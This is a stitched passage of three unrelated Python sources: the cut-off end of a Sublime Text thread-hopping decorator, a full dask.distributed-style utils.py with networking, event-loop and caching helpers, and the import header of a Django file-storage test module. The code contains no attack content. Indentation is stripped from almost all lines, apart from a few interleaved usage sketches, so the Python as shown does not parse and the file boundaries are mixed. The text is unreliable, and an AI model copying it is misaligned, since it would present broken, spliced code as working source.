"""Mark given function as cooperative.
    `fn` must return `HopperR`, i.e. it must yield AWAIT_UI_THREAD
    or AWAIT_WORKER at some point.
    When calling `fn` it will run on the same thread as the caller
    until the function yields.  It then schedules a task on the
    desired thread which will continue executing the function.
It is thus cooperative in the sense that all other tasks
already queued will get a chance to run before we continue.
It is "async" in the sense that the function does not run
from start to end in a blocking manner but can be suspended.
However, it is sync till the first yield (but you could of
course yield on the first line!), only then execution returns
to the call site.
Be aware that, if the call site and the thread you request are
_not_ the same, you can get concurrent execution afterwards!
"""
def tick(gen, send_value=None):
try:
rv = gen.send(send_value)
except StopIteration:
return
except Exception as ex:
raise ex from None
if rv == AWAIT_UI_THREAD:
enqueue_on_ui(tick, gen)
elif rv == AWAIT_WORKER:
enqueue_on_worker(tick, gen)
def decorated(*args, **kwargs):
gen = fn(*args, **kwargs)
if inspect.isgenerator(gen):
tick(gen)
return decorated
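# Usage sketch (hypothetical command helper): the generator starts on the
# calling thread, hops to Sublime's worker for the slow part, then hops back
# to the UI thread before touching the view.
@cooperative_thread_hopper
def _example_hopper(view, text):
    # type: (sublime.View, str) -> HopperR
    yield AWAIT_WORKER            # continue on the worker thread
    processed = text.upper()      # stand-in for an expensive computation
    yield AWAIT_UI_THREAD         # hop back to the UI thread
    view.set_status("example", processed)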
|
utils.py
|
import asyncio
from asyncio import TimeoutError
import atexit
from collections import deque, OrderedDict, UserDict
from concurrent.futures import ThreadPoolExecutor
from contextlib import contextmanager
import functools
from hashlib import md5
import html
import inspect
import json
import logging
import multiprocessing
import os
import re
import shutil
import socket
from time import sleep
import importlib
from importlib.util import cache_from_source
import sys
import tempfile
import threading
import warnings
import weakref
import pkgutil
import base64
import tblib.pickling_support
import xml.etree.ElementTree
try:
import resource
except ImportError:
resource = None
import dask
from dask import istask
# provide format_bytes here for backwards compatibility
from dask.utils import ( # noqa
format_bytes,
funcname,
format_time,
parse_bytes,
parse_timedelta,
)
import toolz
import tornado
from tornado import gen
from tornado.ioloop import IOLoop
try:
from tornado.ioloop import PollIOLoop
except ImportError:
PollIOLoop = None # dropped in tornado 6.0
from .compatibility import PYPY, WINDOWS, get_running_loop
from .metrics import time
try:
from dask.context import thread_state
except ImportError:
thread_state = threading.local()
logger = _logger = logging.getLogger(__name__)
no_default = "__no_default__"
def _initialize_mp_context():
if WINDOWS or PYPY:
return multiprocessing
else:
method = dask.config.get("distributed.worker.multiprocessing-method")
ctx = multiprocessing.get_context(method)
# Makes the test suite much faster
preload = ["distributed"]
if "pkg_resources" in sys.modules:
preload.append("pkg_resources")
from .versions import required_packages, optional_packages
for pkg, _ in required_packages + optional_packages:
try:
importlib.import_module(pkg)
except ImportError:
pass
else:
preload.append(pkg)
ctx.set_forkserver_preload(preload)
return ctx
mp_context = _initialize_mp_context()
def has_arg(func, argname):
"""
Whether the function takes an argument with the given name.
"""
while True:
try:
if argname in inspect.getfullargspec(func).args:
return True
except TypeError:
break
try:
# For Tornado coroutines and other decorated functions
func = func.__wrapped__
except AttributeError:
break
return False
def get_fileno_limit():
"""
Get the maximum number of open files per process.
"""
if resource is not None:
return resource.getrlimit(resource.RLIMIT_NOFILE)[0]
else:
# Default ceiling for Windows when using the CRT, though it
# is settable using _setmaxstdio().
return 512
@toolz.memoize
def _get_ip(host, port, family):
# By using a UDP socket, we don't actually try to connect but
# simply select the local address through which *host* is reachable.
sock = socket.socket(family, socket.SOCK_DGRAM)
try:
sock.connect((host, port))
ip = sock.getsockname()[0]
return ip
except EnvironmentError as e:
warnings.warn(
"Couldn't detect a suitable IP address for "
"reaching %r, defaulting to hostname: %s" % (host, e),
RuntimeWarning,
)
addr_info = socket.getaddrinfo(
socket.gethostname(), port, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP
)[0]
return addr_info[4][0]
finally:
sock.close()
def get_ip(host="8.8.8.8", port=80):
"""
Get the local IP address through which the *host* is reachable.
*host* defaults to a well-known Internet host (one of Google's public
DNS servers).
"""
return _get_ip(host, port, family=socket.AF_INET)
def get_ipv6(host="2001:4860:4860::8888", port=80):
"""
The same as get_ip(), but for IPv6.
"""
return _get_ip(host, port, family=socket.AF_INET6)
def get_ip_interface(ifname):
"""
Get the local IPv4 address of a network interface.
KeyError is raised if the interface doesn't exist.
    ValueError is raised if the interface does not have an IPv4 address
associated with it.
"""
import psutil
net_if_addrs = psutil.net_if_addrs()
if ifname not in net_if_addrs:
allowed_ifnames = list(net_if_addrs.keys())
raise ValueError(
"{!r} is not a valid network interface. "
"Valid network interfaces are: {}".format(ifname, allowed_ifnames)
)
for info in net_if_addrs[ifname]:
if info.family == socket.AF_INET:
return info.address
raise ValueError("interface %r doesn't have an IPv4 address" % (ifname,))
@contextmanager
def ignoring(*exceptions):
try:
yield
    except exceptions:
        pass
@gen.coroutine
def ignore_exceptions(coroutines, *exceptions):
""" Process list of coroutines, ignoring certain exceptions
>>> coroutines = [cor(...) for ...] # doctest: +SKIP
>>> x = yield ignore_exceptions(coroutines, TypeError) # doctest: +SKIP
"""
wait_iterator = gen.WaitIterator(*coroutines)
results = []
while not wait_iterator.done():
with ignoring(*exceptions):
result = yield wait_iterator.next()
results.append(result)
raise gen.Return(results)
async def All(args, quiet_exceptions=()):
""" Wait on many tasks at the same time
Err once any of the tasks err.
See https://github.com/tornadoweb/tornado/issues/1546
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*map(asyncio.ensure_future, args))
results = [None for _ in args]
while not tasks.done():
try:
result = await tasks.next()
except Exception:
@gen.coroutine
def quiet():
""" Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
return results
async def Any(args, quiet_exceptions=()):
""" Wait on many tasks at the same time and return when any is finished
Err once any of the tasks err.
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*map(asyncio.ensure_future, args))
results = [None for _ in args]
while not tasks.done():
try:
result = await tasks.next()
except Exception:
@gen.coroutine
def quiet():
""" Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
break
return results
def sync(loop, func, *args, callback_timeout=None, **kwargs):
"""
Run coroutine in loop running in separate thread.
"""
    # Tornado's PollIOLoop doesn't raise when used after being closed; do it ourselves
if PollIOLoop and (
(isinstance(loop, PollIOLoop) and getattr(loop, "_closing", False))
or (hasattr(loop, "asyncio_loop") and loop.asyncio_loop._closed)
):
raise RuntimeError("IOLoop is closed")
try:
if loop.asyncio_loop.is_closed(): # tornado 6
raise RuntimeError("IOLoop is closed")
except AttributeError:
pass
e = threading.Event()
main_tid = threading.get_ident()
result = [None]
error = [False]
@gen.coroutine
def f():
try:
if main_tid == threading.get_ident():
raise RuntimeError("sync() called from thread of running loop")
yield gen.moment
thread_state.asynchronous = True
future = func(*args, **kwargs)
if callback_timeout is not None:
future = asyncio.wait_for(future, callback_timeout)
result[0] = yield future
except Exception as exc:
error[0] = sys.exc_info()
finally:
thread_state.asynchronous = False
e.set()
loop.add_callback(f)
if callback_timeout is not None:
if not e.wait(callback_timeout):
raise TimeoutError("timed out after %s s." % (callback_timeout,))
else:
while not e.is_set():
e.wait(10)
if error[0]:
typ, exc, tb = error[0]
raise exc.with_traceback(tb)
else:
return result[0]
class LoopRunner:
"""
A helper to start and stop an IO loop in a controlled way.
Several loop runners can associate safely to the same IO loop.
Parameters
----------
loop: IOLoop (optional)
If given, this loop will be re-used, otherwise an appropriate one
will be looked up or created.
asynchronous: boolean (optional, default False)
If false (the default), the loop is meant to run in a separate
thread and will be started if necessary.
If true, the loop is meant to run in the thread this
object is instantiated from, and will not be started automatically.
"""
# All loops currently associated to loop runners
_all_loops = weakref.WeakKeyDictionary()
_lock = threading.Lock()
def __init__(self, loop=None, asynchronous=False):
current = IOLoop.current()
if loop is None:
if asynchronous:
self._loop = current
else:
# We're expecting the loop to run in another thread,
# avoid re-using this thread's assigned loop
self._loop = IOLoop()
self._should_close_loop = True
else:
self._loop = loop
self._should_close_loop = False
self._asynchronous = asynchronous
self._loop_thread = None
self._started = False
with self._lock:
self._all_loops.setdefault(self._loop, (0, None))
def start(self):
"""
Start the IO loop if required. The loop is run in a dedicated
thread.
If the loop is already running, this method does nothing.
"""
with self._lock:
self._start_unlocked()
def _start_unlocked(self):
assert not self._started
count, real_runner = self._all_loops[self._loop]
if self._asynchronous or real_runner is not None or count > 0:
self._all_loops[self._loop] = count + 1, real_runner
self._started = True
return
assert self._loop_thread is None
assert count == 0
loop_evt = threading.Event()
done_evt = threading.Event()
in_thread = [None]
start_exc = [None]
def loop_cb():
in_thread[0] = threading.current_thread()
loop_evt.set()
def run_loop(loop=self._loop):
loop.add_callback(loop_cb)
try:
loop.start()
except Exception as e:
start_exc[0] = e
finally:
done_evt.set()
thread = threading.Thread(target=run_loop, name="IO loop")
thread.daemon = True
thread.start()
loop_evt.wait(timeout=10)
self._started = True
actual_thread = in_thread[0]
if actual_thread is not thread:
# Loop already running in other thread (user-launched)
done_evt.wait(5)
if not isinstance(start_exc[0], RuntimeError):
if not isinstance(
start_exc[0], Exception
): # track down infrequent error
raise TypeError("not an exception", start_exc[0])
raise start_exc[0]
self._all_loops[self._loop] = count + 1, None
else:
assert start_exc[0] is None, start_exc
self._loop_thread = thread
self._all_loops[self._loop] = count + 1, self
def stop(self, timeout=10):
"""
Stop and close the loop if it was created by us.
Otherwise, just mark this object "stopped".
"""
with self._lock:
self._stop_unlocked(timeout)
def _stop_unlocked(self, timeout):
if not self._started:
return
self._started = False
count, real_runner = self._all_loops[self._loop]
if count > 1:
self._all_loops[self._loop] = count - 1, real_runner
else:
assert count == 1
del self._all_loops[self._loop]
if real_runner is not None:
real_runner._real_stop(timeout)
def _real_stop(self, timeout):
assert self._loop_thread is not None
if self._loop_thread is not None:
try:
self._loop.add_callback(self._loop.stop)
self._loop_thread.join(timeout=timeout)
with ignoring(KeyError): # IOLoop can be missing
self._loop.close()
finally:
self._loop_thread = None
def is_started(self):
"""
Return True between start() and stop() calls, False otherwise.
"""
return self._started
def run_sync(self, func, *args, **kwargs):
"""
Convenience helper: start the loop if needed,
run sync(func, *args, **kwargs), then stop the loop again.
"""
if self._started:
return sync(self.loop, func, *args, **kwargs)
else:
self.start()
try:
return sync(self.loop, func, *args, **kwargs)
finally:
self.stop()
@property
def loop(self):
return self._loop
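# Usage sketch (assumed coroutine for illustration): LoopRunner starts a
# private IO loop in a background thread, and run_sync() drives a coroutine
# on that loop while blocking the calling thread, stopping the loop again
# afterwards.
def _example_loop_runner():
    async def add(x, y):
        return x + y
    runner = LoopRunner()
    return runner.run_sync(add, 1, 2)  # starts the loop if needed, returns 3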
@contextmanager
def set_thread_state(**kwargs):
old = {}
for k in kwargs:
try:
old[k] = getattr(thread_state, k)
except AttributeError:
pass
for k, v in kwargs.items():
setattr(thread_state, k, v)
try:
yield
finally:
for k in kwargs:
try:
v = old[k]
except KeyError:
delattr(thread_state, k)
else:
setattr(thread_state, k, v)
@contextmanager
def tmp_text(filename, text):
fn = os.path.join(tempfile.gettempdir(), filename)
with open(fn, "w") as f:
f.write(text)
try:
yield fn
finally:
if os.path.exists(fn):
os.remove(fn)
def clear_queue(q):
while not q.empty():
q.get_nowait()
def is_kernel():
""" Determine if we're running within an IPython kernel
>>> is_kernel()
False
"""
# http://stackoverflow.com/questions/34091701/determine-if-were-in-an-ipython-notebook-session
if "IPython" not in sys.modules: # IPython hasn't been imported
return False
from IPython import get_ipython
# check for `kernel` attribute on the IPython instance
return getattr(get_ipython(), "kernel", None) is not None
hex_pattern = re.compile("[a-f]+")
@functools.lru_cache(100000)
def key_split(s):
"""
>>> key_split('x')
'x'
>>> key_split('x-1')
'x'
>>> key_split('x-1-2-3')
'x'
>>> key_split(('x-2', 1))
'x'
>>> key_split("('x-2', 1)")
'x'
>>> key_split("('x', 1)")
'x'
>>> key_split('hello-world-1')
'hello-world'
>>> key_split(b'hello-world-1')
'hello-world'
>>> key_split('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split(None)
'Other'
>>> key_split('x-abcdefab') # ignores hex
'x'
"""
if type(s) is bytes:
s = s.decode()
if type(s) is tuple:
s = s[0]
try:
words = s.split("-")
if not words[0][0].isalpha():
result = words[0].split(",")[0].strip("'(\"")
else:
result = words[0]
for word in words[1:]:
if word.isalpha() and not (
len(word) == 8 and hex_pattern.match(word) is not None
):
result += "-" + word
else:
break
if len(result) == 32 and re.match(r"[a-f0-9]{32}", result):
return "data"
else:
if result[0] == "<":
result = result.strip("<>").split()[0].split(".")[-1]
return result
except Exception:
return "Other"
def key_split_group(x):
"""A more fine-grained version of key_split
>>> key_split_group(('x-2', 1))
'x-2'
>>> key_split_group("('x-2', 1)")
'x-2'
>>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split_group('<module.submodule.myclass object at 0xdaf372')
'myclass'
    >>> key_split_group('x')
    ''
    >>> key_split_group('x-1')
    ''
"""
typ = type(x)
if typ is tuple:
return x[0]
elif typ is str:
if x[0] == "(":
return x.split(",", 1)[0].strip("()\"'")
elif len(x) == 32 and re.match(r"[a-f0-9]{32}", x):
return "data"
elif x[0] == "<":
return x.strip("<>").split()[0].split(".")[-1]
else:
return ""
elif typ is bytes:
return key_split_group(x.decode())
else:
return ""
@contextmanager
def log_errors(pdb=False):
from .comm import CommClosedError
try:
yield
except (CommClosedError, gen.Return):
raise
except Exception as e:
try:
logger.exception(e)
except TypeError: # logger becomes None during process cleanup
pass
if pdb:
import pdb
pdb.set_trace()
raise
def silence_logging(level, root="distributed"):
"""
Change all StreamHandlers for the given logger to the given level
"""
if isinstance(level, str):
level = getattr(logging, level.upper())
old = None
logger = logging.getLogger(root)
for handler in logger.handlers:
if isinstance(handler, logging.StreamHandler):
old = handler.level
handler.setLevel(level)
return old
@toolz.memoize
def ensure_ip(hostname):
""" Ensure that address is an IP address
Examples
--------
>>> ensure_ip('localhost')
'127.0.0.1'
>>> ensure_ip('123.123.123.123') # pass through IP addresses
'123.123.123.123'
"""
# Prefer IPv4 over IPv6, for compatibility
families = [socket.AF_INET, socket.AF_INET6]
for fam in families:
try:
results = socket.getaddrinfo(
hostname, 1234, fam, socket.SOCK_STREAM # dummy port number
)
except socket.gaierror as e:
exc = e
else:
return results[0][4][0]
raise exc
tblib.pickling_support.install()
def get_traceback():
exc_type, exc_value, exc_traceback = sys.exc_info()
bad = [
os.path.join("distributed", "worker"),
os.path.join("distributed", "scheduler"),
os.path.join("tornado", "gen.py"),
os.path.join("concurrent", "futures"),
]
while exc_traceback and any(
b in exc_traceback.tb_frame.f_code.co_filename for b in bad
):
exc_traceback = exc_traceback.tb_next
return exc_traceback
def truncate_exception(e, n=10000):
""" Truncate exception to be about a certain length """
if len(str(e)) > n:
try:
return type(e)("Long error message", str(e)[:n])
except Exception:
return Exception("Long error message", type(e), str(e)[:n])
else:
return e
def tokey(o):
""" Convert an object to a string.
Examples
--------
>>> tokey(b'x')
b'x'
>>> tokey('x')
'x'
>>> tokey(1)
'1'
"""
typ = type(o)
if typ is str or typ is bytes:
return o
else:
return str(o)
def validate_key(k):
"""Validate a key as received on a stream.
"""
typ = type(k)
if typ is not str and typ is not bytes:
raise TypeError("Unexpected key type %s (value: %r)" % (typ, k))
def _maybe_complex(task):
""" Possibly contains a nested task """
return (
istask(task)
or type(task) is list
and any(map(_maybe_complex, task))
or type(task) is dict
and any(map(_maybe_complex, task.values()))
)
def convert(task, dsk, extra_values):
if type(task) is list:
return [convert(v, dsk, extra_values) for v in task]
if type(task) is dict:
return {k: convert(v, dsk, extra_values) for k, v in task.items()}
if istask(task):
return (task[0],) + tuple(convert(x, dsk, extra_values) for x in task[1:])
try:
if task in dsk or task in extra_values:
return tokey(task)
except TypeError:
pass
return task
def str_graph(dsk, extra_values=()):
return {tokey(k): convert(v, dsk, extra_values) for k, v in dsk.items()}
def seek_delimiter(file, delimiter, blocksize):
""" Seek current file to next byte after a delimiter bytestring
This seeks the file to the next byte following the delimiter. It does
not return anything. Use ``file.tell()`` to see location afterwards.
Parameters
----------
file: a file
delimiter: bytes
a delimiter like ``b'\n'`` or message sentinel
blocksize: int
Number of bytes to read from the file at once.
"""
if file.tell() == 0:
return
last = b""
while True:
current = file.read(blocksize)
if not current:
return
full = last + current
try:
i = full.index(delimiter)
file.seek(file.tell() - (len(full) - i) + len(delimiter))
return
except ValueError:
pass
last = full[-len(delimiter) :]
def read_block(f, offset, length, delimiter=None):
""" Read a block of bytes from a file
Parameters
----------
f: file
File-like object supporting seek, read, tell, etc..
offset: int
Byte offset to start read
length: int
Number of bytes to read
delimiter: bytes (optional)
Ensure reading starts and stops at delimiter bytestring
If using the ``delimiter=`` keyword argument we ensure that the read
starts and stops at delimiter boundaries that follow the locations
``offset`` and ``offset + length``. If ``offset`` is zero then we
start at zero. The bytestring returned WILL include the
terminating delimiter string.
Examples
--------
>>> from io import BytesIO # doctest: +SKIP
>>> f = BytesIO(b'Alice, 100\\nBob, 200\\nCharlie, 300') # doctest: +SKIP
>>> read_block(f, 0, 13) # doctest: +SKIP
b'Alice, 100\\nBo'
>>> read_block(f, 0, 13, delimiter=b'\\n') # doctest: +SKIP
b'Alice, 100\\nBob, 200\\n'
>>> read_block(f, 10, 10, delimiter=b'\\n') # doctest: +SKIP
b'Bob, 200\\nCharlie, 300'
"""
if delimiter:
f.seek(offset)
seek_delimiter(f, delimiter, 2 ** 16)
start = f.tell()
length -= start - offset
f.seek(start + length)
seek_delimiter(f, delimiter, 2 ** 16)
end = f.tell()
offset = start
length = end - start
f.seek(offset)
bytes = f.read(length)
return bytes
@contextmanager
def tmpfile(extension=""):
extension = "." + extension.lstrip(".")
handle, filename = tempfile.mkstemp(extension)
os.close(handle)
os.remove(filename)
yield filename
if os.path.exists(filename):
try:
if os.path.isdir(filename):
shutil.rmtree(filename)
else:
os.remove(filename)
except OSError: # sometimes we can't remove a generated temp file
pass
def ensure_bytes(s):
"""Attempt to turn `s` into bytes.
Parameters
----------
s : Any
        The object to be converted. Correctly handles
* str
* bytes
* objects implementing the buffer protocol (memoryview, ndarray, etc.)
Returns
-------
b : bytes
Raises
------
TypeError
When `s` cannot be converted
Examples
--------
>>> ensure_bytes('123')
b'123'
>>> ensure_bytes(b'123')
b'123'
"""
if hasattr(s, "encode"):
return s.encode()
else:
try:
return bytes(s)
except Exception as e:
raise TypeError(
"Object %s is neither a bytes object nor has an encode method" % s
) from e
def divide_n_among_bins(n, bins):
"""
>>> divide_n_among_bins(12, [1, 1])
[6, 6]
>>> divide_n_among_bins(12, [1, 2])
[4, 8]
>>> divide_n_among_bins(12, [1, 2, 1])
[3, 6, 3]
>>> divide_n_among_bins(11, [1, 2, 1])
[2, 6, 3]
>>> divide_n_among_bins(11, [.1, .2, .1])
[2, 6, 3]
"""
total = sum(bins)
acc = 0.0
out = []
for b in bins:
now = n / total * b + acc
now, acc = divmod(now, 1)
out.append(int(now))
return out
def mean(seq):
seq = list(seq)
return sum(seq) / len(seq)
if hasattr(sys, "is_finalizing"):
def shutting_down(is_finalizing=sys.is_finalizing):
return is_finalizing()
else:
_shutting_down = [False]
def _at_shutdown(l=_shutting_down):
l[0] = True
def shutting_down(l=_shutting_down):
return l[0]
atexit.register(_at_shutdown)
shutting_down.__doc__ = """
Whether the interpreter is currently shutting down.
For use in finalizers, __del__ methods, and similar; it is advised
to early bind this function rather than look it up when calling it,
since at shutdown module globals may be cleared.
"""
def open_port(host=""):
""" Return a probably-open port
There is a chance that this port will be taken by the operating system soon
after returning from this function.
"""
# http://stackoverflow.com/questions/2838244/get-open-tcp-port-in-python
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
def import_file(path):
""" Loads modules for a file (.py, .zip, .egg) """
directory, filename = os.path.split(path)
name, ext = os.path.splitext(filename)
names_to_import = []
tmp_python_path = None
if ext in (".py",): # , '.pyc'):
if directory not in sys.path:
tmp_python_path = directory
names_to_import.append(name)
if ext == ".py": # Ensure that no pyc file will be reused
cache_file = cache_from_source(path)
with ignoring(OSError):
os.remove(cache_file)
if ext in (".egg", ".zip", ".pyz"):
if path not in sys.path:
sys.path.insert(0, path)
if sys.version_info >= (3, 6):
names = (mod_info.name for mod_info in pkgutil.iter_modules([path]))
else:
names = (mod_info[1] for mod_info in pkgutil.iter_modules([path]))
names_to_import.extend(names)
loaded = []
if not names_to_import:
logger.warning("Found nothing to import from %s", filename)
else:
importlib.invalidate_caches()
if tmp_python_path is not None:
sys.path.insert(0, tmp_python_path)
try:
for name in names_to_import:
logger.info("Reload module %s from %s file", name, ext)
loaded.append(importlib.reload(importlib.import_module(name)))
finally:
if tmp_python_path is not None:
sys.path.remove(tmp_python_path)
return loaded
class itemgetter:
"""A picklable itemgetter.
Examples
--------
>>> data = [0, 1, 2]
>>> get_1 = itemgetter(1)
>>> get_1(data)
1
"""
__slots__ = ("index",)
def __init__(self, index):
self.index = index
def __call__(self, x):
return x[self.index]
def __reduce__(self):
return (itemgetter, (self.index,))
def asciitable(columns, rows):
"""Formats an ascii table for given columns and rows.
Parameters
----------
columns : list
The column names
rows : list of tuples
The rows in the table. Each tuple must be the same length as
``columns``.
"""
rows = [tuple(str(i) for i in r) for r in rows]
columns = tuple(str(i) for i in columns)
widths = tuple(max(max(map(len, x)), len(c)) for x, c in zip(zip(*rows), columns))
row_template = ("|" + (" %%-%ds |" * len(columns))) % widths
header = row_template % tuple(columns)
bar = "+%s+" % "+".join("-" * (w + 2) for w in widths)
data = "\n".join(row_template % r for r in rows)
return "\n".join([bar, header, bar, data, bar])
def nbytes(frame, _bytes_like=(bytes, bytearray)):
""" Number of bytes of a frame or memoryview """
if isinstance(frame, _bytes_like):
return len(frame)
else:
try:
return frame.nbytes
except AttributeError:
return len(frame)
def PeriodicCallback(callback, callback_time, io_loop=None):
"""
Wrapper around tornado.IOLoop.PeriodicCallback, for compatibility
with removal of the `io_loop` parameter in Tornado 5.0.
"""
if tornado.version_info >= (5,):
return tornado.ioloop.PeriodicCallback(callback, callback_time)
else:
return tornado.ioloop.PeriodicCallback(callback, callback_time, io_loop)
@contextmanager
def time_warn(duration, text):
start = time()
yield
end = time()
if end - start > duration:
print("TIME WARNING", text, end - start)
def json_load_robust(fn, load=json.load):
""" Reads a JSON file from disk that may be being written as we read """
while not os.path.exists(fn):
sleep(0.01)
for i in range(10):
try:
with open(fn) as f:
cfg = load(f)
if cfg:
return cfg
except (ValueError, KeyError): # race with writing process
pass
sleep(0.1)
class DequeHandler(logging.Handler):
""" A logging.Handler that records records into a deque """
_instances = weakref.WeakSet()
def __init__(self, *args, n=10000, **kwargs):
self.deque = deque(maxlen=n)
super(DequeHandler, self).__init__(*args, **kwargs)
self._instances.add(self)
def emit(self, record):
self.deque.append(record)
def clear(self):
"""
Clear internal storage.
"""
self.deque.clear()
@classmethod
def clear_all_instances(cls):
"""
Clear the internal storage of all live DequeHandlers.
"""
for inst in list(cls._instances):
inst.clear()
def reset_logger_locks():
""" Python 2's logger's locks don't survive a fork event
https://github.com/dask/distributed/issues/1491
"""
for name in logging.Logger.manager.loggerDict.keys():
for handler in logging.getLogger(name).handlers:
handler.createLock()
if tornado.version_info[0] >= 5:
is_server_extension = False
if "notebook" in sys.modules:
import traitlets
from notebook.notebookapp import NotebookApp
is_server_extension = traitlets.config.Application.initialized() and isinstance(
traitlets.config.Application.instance(), NotebookApp
)
if not is_server_extension:
is_kernel_and_no_running_loop = False
if is_kernel():
try:
get_running_loop()
except RuntimeError:
is_kernel_and_no_running_loop = True
if not is_kernel_and_no_running_loop:
import tornado.platform.asyncio
asyncio.set_event_loop_policy(
tornado.platform.asyncio.AnyThreadEventLoopPolicy()
)
@functools.lru_cache(1000)
def has_keyword(func, keyword):
return keyword in inspect.signature(func).parameters
# from bokeh.palettes import viridis
# palette = viridis(18)
palette = [
"#440154",
"#471669",
"#472A79",
"#433C84",
"#3C4D8A",
"#355D8C",
"#2E6C8E",
"#287A8E",
"#23898D",
"#1E978A",
"#20A585",
"#2EB27C",
"#45BF6F",
"#64CB5D",
"#88D547",
"#AFDC2E",
"#D7E219",
"#FDE724",
]
@toolz.memoize
def color_of(x, palette=palette):
h = md5(str(x).encode())
n = int(h.hexdigest()[:8], 16)
return palette[n % len(palette)]
def iscoroutinefunction(f):
if gen.is_coroutine_function(f):
return True
if sys.version_info >= (3, 5) and inspect.iscoroutinefunction(f):
return True
return False
@contextmanager
def warn_on_duration(duration, msg):
start = time()
yield
stop = time()
if stop - start > parse_timedelta(duration):
warnings.warn(msg, stacklevel=2)
def typename(typ):
""" Return name of type
Examples
--------
>>> from distributed import Scheduler
>>> typename(Scheduler)
'distributed.scheduler.Scheduler'
"""
try:
return typ.__module__ + "." + typ.__name__
except AttributeError:
return str(typ)
def format_dashboard_link(host, port):
template = dask.config.get("distributed.dashboard.link")
if dask.config.get("distributed.scheduler.dashboard.tls.cert"):
scheme = "https"
else:
scheme = "http"
return template.format(
**toolz.merge(os.environ, dict(scheme=scheme, host=host, port=port))
)
def is_coroutine_function(f):
return asyncio.iscoroutinefunction(f) or gen.is_coroutine_function(f)
class Log(str):
""" A container for logs """
def _repr_html_(self):
return "<pre><code>\n{log}\n</code></pre>".format(
log=html.escape(self.rstrip())
)
class Logs(dict):
""" A container for multiple logs """
def _repr_html_(self):
summaries = [
"<details>\n"
"<summary style='display:list-item'>{title}</summary>\n"
"{log}\n"
"</details>".format(title=title, log=log._repr_html_())
for title, log in sorted(self.items())
]
return "\n".join(summaries)
def cli_keywords(d: dict, cls=None):
""" Convert a kwargs dictionary into a list of CLI keywords
Parameters
----------
d: dict
The keywords to convert
cls: callable
The callable that consumes these terms to check them for validity
Examples
--------
>>> cli_keywords({"x": 123, "save_file": "foo.txt"})
['--x', '123', '--save-file', 'foo.txt']
>>> from dask.distributed import Worker
>>> cli_keywords({"x": 123}, Worker)
Traceback (most recent call last):
...
ValueError: Class distributed.worker.Worker does not support keyword x
"""
if cls:
for k in d:
if not has_keyword(cls, k):
raise ValueError(
"Class %s does not support keyword %s" % (typename(cls), k)
)
def convert_value(v):
out = str(v)
if " " in out and "'" not in out and '"' not in out:
out = '"' + out + '"'
return out
return sum(
[["--" + k.replace("_", "-"), convert_value(v)] for k, v in d.items()], []
)
def is_valid_xml(text):
return xml.etree.ElementTree.fromstring(text) is not None
try:
_offload_executor = ThreadPoolExecutor(
max_workers=1, thread_name_prefix="Dask-Offload"
)
except TypeError:
_offload_executor = ThreadPoolExecutor(max_workers=1)
weakref.finalize(_offload_executor, _offload_executor.shutdown)
def import_term(name: str):
""" Return the fully qualified term
Examples
--------
>>> import_term("math.sin")
<function math.sin(x, /)>
"""
try:
module_name, attr_name = name.rsplit(".", 1)
except ValueError:
return importlib.import_module(name)
module = importlib.import_module(module_name)
return getattr(module, attr_name)
async def offload(fn, *args, **kwargs):
loop = asyncio.get_event_loop()
return await loop.run_in_executor(_offload_executor, lambda: fn(*args, **kwargs))
def serialize_for_cli(data):
""" Serialize data into a string that can be passthrough cli
Parameters
----------
data: json-serializable object
The data to serialize
Returns
-------
serialized_data: str
The serialized data as a string
"""
return base64.urlsafe_b64encode(json.dumps(data).encode()).decode()
def deserialize_for_cli(data):
""" De-serialize data into the original object
Parameters
----------
data: str
        String serialized by serialize_for_cli()
Returns
-------
deserialized_data: obj
The de-serialized data
"""
return json.loads(base64.urlsafe_b64decode(data.encode()).decode())
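# Round-trip sketch: any JSON-serializable object survives the CLI-safe
# base64 encoding unchanged (the payload below is illustrative).
def _example_cli_roundtrip():
    payload = {"scheduler-address": "tcp://127.0.0.1:8786", "retries": 3}
    encoded = serialize_for_cli(payload)  # url-safe base64 text, no spaces
    assert deserialize_for_cli(encoded) == payload
    return encoded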
class EmptyContext:
def __enter__(self):
pass
def __exit__(self, *args):
pass
async def __aenter__(self):
pass
async def __aexit__(self, *args):
pass
empty_context = EmptyContext()
class LRU(UserDict):
""" Limited size mapping, evicting the least recently looked-up key when full
"""
def __init__(self, maxsize):
super().__init__()
self.data = OrderedDict()
self.maxsize = maxsize
def __getitem__(self, key):
value = super().__getitem__(key)
self.data.move_to_end(key)
return value
    def __setitem__(self, key, value):
        # Only evict when inserting a genuinely new key; overwriting an
        # existing key must not shrink the cache.
        if key not in self.data and len(self) >= self.maxsize:
            self.data.popitem(last=False)
        super().__setitem__(key, value)
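# Behaviour sketch: with maxsize=2, a lookup refreshes the key, so the least
# recently *looked-up* key is the one evicted on overflow.
def _example_lru_usage():
    cache = LRU(maxsize=2)
    cache["a"] = 1
    cache["b"] = 2
    cache["a"]            # refresh "a"
    cache["c"] = 3        # evicts "b", the least recently looked-up key
    assert "a" in cache and "b" not in cache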
|
tests.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import errno
import os
import shutil
import sys
import tempfile
import time
import unittest
from datetime import datetime, timedelta
try:
import threading
except ImportError:
import dummy_threading as threading
from django.core.cache import cache
from django.core.exceptions import SuspiciousOperation
from django.core.files.base import File, ContentFile
from django.core.files.storage import FileSystemStorage, get_storage_class
from django.core.files.uploadedfile import SimpleUploadedFile
from django.test import LiveServerTestCase, SimpleTestCase
from django.test import override_settings
from django.utils import six
from django.utils.six.moves.urllib.request import urlopen
from django.utils._os import upath
from .models import Storage, temp_storage, temp_storage_location
